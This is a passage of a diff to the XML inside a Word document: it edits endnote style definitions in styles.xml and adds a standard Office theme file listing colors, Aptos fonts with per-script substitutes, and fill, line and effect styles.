     <w:link w:val="FootnoteText"/>
     <w:uiPriority w:val="99"/>
     <w:semiHidden/>
@@ -6696,7 +7576,6 @@
   </w:style>
   <w:style w:type="character" w:styleId="EndnoteReference">
     <w:name w:val="endnote reference"/>
-    <w:basedOn w:val="DefaultParagraphFont"/>
     <w:uiPriority w:val="99"/>
     <w:semiHidden/>
     <w:unhideWhenUsed/>
@@ -6706,22 +7585,13 @@
   </w:style>
   <w:style w:type="paragraph" w:styleId="EndnoteText">
     <w:name w:val="endnote text"/>
-    <w:basedOn w:val="Normal"/>
     <w:link w:val="EndnoteTextChar"/>
     <w:uiPriority w:val="99"/>
     <w:semiHidden/>
     <w:unhideWhenUsed/>
-    <w:pPr>
-      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-    </w:pPr>
-    <w:rPr>
-      <w:sz w:val="20"/>
-      <w:szCs w:val="20"/>
-    </w:rPr>
   </w:style>
-  <w:style w:type="character" w:styleId="EndnoteTextChar">
+  <w:style w:type="character" w:customStyle="1" w:styleId="EndnoteTextChar">
     <w:name w:val="Endnote Text Char"/>
-    <w:basedOn w:val="DefaultParagraphFont"/>
     <w:link w:val="EndnoteText"/>
     <w:uiPriority w:val="99"/>
     <w:semiHidden/>
@@ -6732,4 +7602,319 @@
     </w:rPr>
   </w:style>
 </w:styles>
+</file>
+
+<file path=word/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
+<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="Office Theme">
+  <a:themeElements>
+    <a:clrScheme name="Office">
+      <a:dk1>
+        <a:sysClr val="windowText" lastClr="000000"/>
+      </a:dk1>
+      <a:lt1>
+        <a:sysClr val="window" lastClr="FFFFFF"/>
+      </a:lt1>
+      <a:dk2>
+        <a:srgbClr val="0E2841"/>
+      </a:dk2>
+      <a:lt2>
+        <a:srgbClr val="E8E8E8"/>
+      </a:lt2>
+      <a:accent1>
+        <a:srgbClr val="156082"/>
+      </a:accent1>
+      <a:accent2>
+        <a:srgbClr val="E97132"/>
+      </a:accent2>
+      <a:accent3>
+        <a:srgbClr val="196B24"/>
+      </a:accent3>
+      <a:accent4>
+        <a:srgbClr val="0F9ED5"/>
+      </a:accent4>
+      <a:accent5>
+        <a:srgbClr val="A02B93"/>
+      </a:accent5>
+      <a:accent6>
+        <a:srgbClr val="4EA72E"/>
+      </a:accent6>
+      <a:hlink>
+        <a:srgbClr val="467886"/>
+      </a:hlink>
+      <a:folHlink>
+        <a:srgbClr val="96607D"/>
+      </a:folHlink>
+    </a:clrScheme>
+    <a:fontScheme name="Office">
+      <a:majorFont>
+        <a:latin typeface="Aptos Display" panose="02110004020202020204"/>
+        <a:ea typeface=""/>
+        <a:cs typeface=""/>
+        <a:font script="Jpan" typeface="游ゴシック Light"/>
+        <a:font script="Hang" typeface="맑은 고딕"/>
+        <a:font script="Hans" typeface="等线 Light"/>
+        <a:font script="Hant" typeface="新細明體"/>
+        <a:font script="Arab" typeface="Times New Roman"/>
+        <a:font script="Hebr" typeface="Times New Roman"/>
+        <a:font script="Thai" typeface="Angsana New"/>
+        <a:font script="Ethi" typeface="Nyala"/>
+        <a:font script="Beng" typeface="Vrinda"/>
+        <a:font script="Gujr" typeface="Shruti"/>
+        <a:font script="Khmr" typeface="MoolBoran"/>
+        <a:font script="Knda" typeface="Tunga"/>
+        <a:font script="Guru" typeface="Raavi"/>
+        <a:font script="Cans" typeface="Euphemia"/>
+        <a:font script="Cher" typeface="Plantagenet Cherokee"/>
+        <a:font script="Yiii" typeface="Microsoft Yi Baiti"/>
+        <a:font script="Tibt" typeface="Microsoft Himalaya"/>
+        <a:font script="Thaa" typeface="MV Boli"/>
+        <a:font script="Deva" typeface="Mangal"/>
+        <a:font script="Telu" typeface="Gautami"/>
+        <a:font script="Taml" typeface="Latha"/>
+        <a:font script="Syrc" typeface="Estrangelo Edessa"/>
+        <a:font script="Orya" typeface="Kalinga"/>
+        <a:font script="Mlym" typeface="Kartika"/>
+        <a:font script="Laoo" typeface="DokChampa"/>
+        <a:font script="Sinh" typeface="Iskoola Pota"/>
+        <a:font script="Mong" typeface="Mongolian Baiti"/>
+        <a:font script="Viet" typeface="Times New Roman"/>
+        <a:font script="Uigh" typeface="Microsoft Uighur"/>
+        <a:font script="Geor" typeface="Sylfaen"/>
+        <a:font script="Armn" typeface="Arial"/>
+        <a:font script="Bugi" typeface="Leelawadee UI"/>
+        <a:font script="Bopo" typeface="Microsoft JhengHei"/>
+        <a:font script="Java" typeface="Javanese Text"/>
+        <a:font script="Lisu" typeface="Segoe UI"/>
+        <a:font script="Mymr" typeface="Myanmar Text"/>
+        <a:font script="Nkoo" typeface="Ebrima"/>
+        <a:font script="Olck" typeface="Nirmala UI"/>
+        <a:font script="Osma" typeface="Ebrima"/>
+        <a:font script="Phag" typeface="Phagspa"/>
+        <a:font script="Syrn" typeface="Estrangelo Edessa"/>
+        <a:font script="Syrj" typeface="Estrangelo Edessa"/>
+        <a:font script="Syre" typeface="Estrangelo Edessa"/>
+        <a:font script="Sora" typeface="Nirmala UI"/>
+        <a:font script="Tale" typeface="Microsoft Tai Le"/>
+        <a:font script="Talu" typeface="Microsoft New Tai Lue"/>
+        <a:font script="Tfng" typeface="Ebrima"/>
+      </a:majorFont>
+      <a:minorFont>
+        <a:latin typeface="Aptos" panose="02110004020202020204"/>
+        <a:ea typeface=""/>
+        <a:cs typeface=""/>
+        <a:font script="Jpan" typeface="游明朝"/>
+        <a:font script="Hang" typeface="맑은 고딕"/>
+        <a:font script="Hans" typeface="等线"/>
+        <a:font script="Hant" typeface="新細明體"/>
+        <a:font script="Arab" typeface="Arial"/>
+        <a:font script="Hebr" typeface="Arial"/>
+        <a:font script="Thai" typeface="Cordia New"/>
+        <a:font script="Ethi" typeface="Nyala"/>
+        <a:font script="Beng" typeface="Vrinda"/>
+        <a:font script="Gujr" typeface="Shruti"/>
+        <a:font script="Khmr" typeface="DaunPenh"/>
+        <a:font script="Knda" typeface="Tunga"/>
+        <a:font script="Guru" typeface="Raavi"/>
+        <a:font script="Cans" typeface="Euphemia"/>
+        <a:font script="Cher" typeface="Plantagenet Cherokee"/>
+        <a:font script="Yiii" typeface="Microsoft Yi Baiti"/>
+        <a:font script="Tibt" typeface="Microsoft Himalaya"/>
+        <a:font script="Thaa" typeface="MV Boli"/>
+        <a:font script="Deva" typeface="Mangal"/>
+        <a:font script="Telu" typeface="Gautami"/>
+        <a:font script="Taml" typeface="Latha"/>
+        <a:font script="Syrc" typeface="Estrangelo Edessa"/>
+        <a:font script="Orya" typeface="Kalinga"/>
+        <a:font script="Mlym" typeface="Kartika"/>
+        <a:font script="Laoo" typeface="DokChampa"/>
+        <a:font script="Sinh" typeface="Iskoola Pota"/>
+        <a:font script="Mong" typeface="Mongolian Baiti"/>
+        <a:font script="Viet" typeface="Arial"/>
+        <a:font script="Uigh" typeface="Microsoft Uighur"/>
+        <a:font script="Geor" typeface="Sylfaen"/>
+        <a:font script="Armn" typeface="Arial"/>
+        <a:font script="Bugi" typeface="Leelawadee UI"/>
+        <a:font script="Bopo" typeface="Microsoft JhengHei"/>
+        <a:font script="Java" typeface="Javanese Text"/>
+        <a:font script="Lisu" typeface="Segoe UI"/>
+        <a:font script="Mymr" typeface="Myanmar Text"/>
+        <a:font script="Nkoo" typeface="Ebrima"/>
+        <a:font script="Olck" typeface="Nirmala UI"/>
+        <a:font script="Osma" typeface="Ebrima"/>
+        <a:font script="Phag" typeface="Phagspa"/>
+        <a:font script="Syrn" typeface="Estrangelo Edessa"/>
+        <a:font script="Syrj" typeface="Estrangelo Edessa"/>
+        <a:font script="Syre" typeface="Estrangelo Edessa"/>
+        <a:font script="Sora" typeface="Nirmala UI"/>
+        <a:font script="Tale" typeface="Microsoft Tai Le"/>
+        <a:font script="Talu" typeface="Microsoft New Tai Lue"/>
+        <a:font script="Tfng" typeface="Ebrima"/>
+      </a:minorFont>
+    </a:fontScheme>
+    <a:fmtScheme name="Office">
+      <a:fillStyleLst>
+        <a:solidFill>
+          <a:schemeClr val="phClr"/>
+        </a:solidFill>
+        <a:gradFill rotWithShape="1">
+          <a:gsLst>
+            <a:gs pos="0">
+              <a:schemeClr val="phClr">
+                <a:lumMod val="110000"/>
+                <a:satMod val="105000"/>
+                <a:tint val="67000"/>
+              </a:schemeClr>
+            </a:gs>
+            <a:gs pos="50000">
+              <a:schemeClr val="phClr">
+                <a:lumMod val="105000"/>
+                <a:satMod val="103000"/>
+                <a:tint val="73000"/>
+              </a:schemeClr>
+            </a:gs>
+            <a:gs pos="100000">
+              <a:schemeClr val="phClr">
+                <a:lumMod val="105000"/>
+                <a:satMod val="109000"/>
+                <a:tint val="81000"/>
+              </a:schemeClr>
+            </a:gs>
+          </a:gsLst>
+          <a:lin ang="5400000" scaled="0"/>
+        </a:gradFill>
+        <a:gradFill rotWithShape="1">
+          <a:gsLst>
+            <a:gs pos="0">
+              <a:schemeClr val="phClr">
+                <a:satMod val="103000"/>
+                <a:lumMod val="102000"/>
+                <a:tint val="94000"/>
+              </a:schemeClr>
+            </a:gs>
+            <a:gs pos="50000">
+              <a:schemeClr val="phClr">
+                <a:satMod val="110000"/>
+                <a:lumMod val="100000"/>
+                <a:shade val="100000"/>
+              </a:schemeClr>
+            </a:gs>
+            <a:gs pos="100000">
+              <a:schemeClr val="phClr">
+                <a:lumMod val="99000"/>
+                <a:satMod val="120000"/>
+                <a:shade val="78000"/>
+              </a:schemeClr>
+            </a:gs>
+          </a:gsLst>
+          <a:lin ang="5400000" scaled="0"/>
+        </a:gradFill>
+      </a:fillStyleLst>
+      <a:lnStyleLst>
+        <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
+          <a:solidFill>
+            <a:schemeClr val="phClr"/>
+          </a:solidFill>
+          <a:prstDash val="solid"/>
+          <a:miter lim="800000"/>
+        </a:ln>
+        <a:ln w="19050" cap="flat" cmpd="sng" algn="ctr">
+          <a:solidFill>
+            <a:schemeClr val="phClr"/>
+          </a:solidFill>
+          <a:prstDash val="solid"/>
+          <a:miter lim="800000"/>
+        </a:ln>
+        <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
+          <a:solidFill>
+            <a:schemeClr val="phClr"/>
+          </a:solidFill>
+          <a:prstDash val="solid"/>
+          <a:miter lim="800000"/>
+        </a:ln>
+      </a:lnStyleLst>
+      <a:effectStyleLst>
+        <a:effectStyle>
+          <a:effectLst/>
+        </a:effectStyle>
+        <a:effectStyle>
+          <a:effectLst/>
+        </a:effectStyle>
+        <a:effectStyle>
+          <a:effectLst>
+            <a:outerShdw blurRad="57150" dist="19050" dir="5400000" algn="ctr" rotWithShape="0">
+              <a:srgbClr val="000000">
+                <a:alpha val="63000"/>
+              </a:srgbClr>
+            </a:outerShdw>
+          </a:effectLst>
+        </a:effectStyle>
+      </a:effectStyleLst>
+      <a:bgFillStyleLst>
+        <a:solidFill>
+          <a:schemeClr val="phClr"/>
+        </a:solidFill>
+        <a:solidFill>
+          <a:schemeClr val="phClr">
+            <a:tint val="95000"/>
+            <a:satMod val="170000"/>
+          </a:schemeClr>
+        </a:solidFill>
+        <a:gradFill rotWithShape="1">
+          <a:gsLst>
+            <a:gs pos="0">
+              <a:schemeClr val="phClr">
+                <a:tint val="93000"/>
+                <a:satMod val="150000"/>
+                <a:shade val="98000"/>
+                <a:lumMod val="102000"/>
+              </a:schemeClr>
+            </a:gs>
+            <a:gs pos="50000">
+              <a:schemeClr val="phClr">
+                <a:tint val="98000"/>
+                <a:satMod val="130000"/>
+                <a:shade val="90000"/>
+                <a:lumMod val="103000"/>
+              </a:schemeClr>
+            </a:gs>
+            <a:gs pos="100000">
+              <a:schemeClr val="phClr">
+                <a:shade val="63000"/>
+                <a:satMod val="120000"/>
+              </a:schemeClr>
+            </a:gs>
+          </a:gsLst>
+          <a:lin ang="5400000" scaled="0"/>
+        </a:gradFill>
+      </a:bgFillStyleLst>
+    </a:fmtScheme>
+  </a:themeElements>
+  <a:objectDefaults>
+    <a:lnDef>
+      <a:spPr/>
+      <a:bodyPr/>
+      <a:lstStyle/>
+      <a:style>
+        <a:lnRef idx="2">
+          <a:schemeClr val="accent1"/>
+        </a:lnRef>
+        <a:fillRef idx="0">
+          <a:schemeClr val="accent1"/>
+        </a:fillRef>
+        <a:effectRef idx="1">
+          <a:schemeClr val="accent1"/>
+        </a:effectRef>
+        <a:fontRef idx="minor">
+          <a:schemeClr val="tx1"/>
+        </a:fontRef>
+      </a:style>
+    </a:lnDef>
+  </a:objectDefaults>
+  <a:extraClrSchemeLst/>
+  <a:extLst>
+    <a:ext uri="{05A4C25C-085E-4340-85A3-A5531E510DB2}">
+      <thm15:themeFamily xmlns:thm15="http://schemas.microsoft.com/office/thememl/2012/main" name="Office Theme" id="{2E142A2C-CD16-42D6-873A-C26D2A0506FA}" vid="{1BDDFF52-6CD6-40A5-AB3C-68EB2F1E4D0A}"/>
+    </a:ext>
+  </a:extLst>
+</a:theme>
 </file>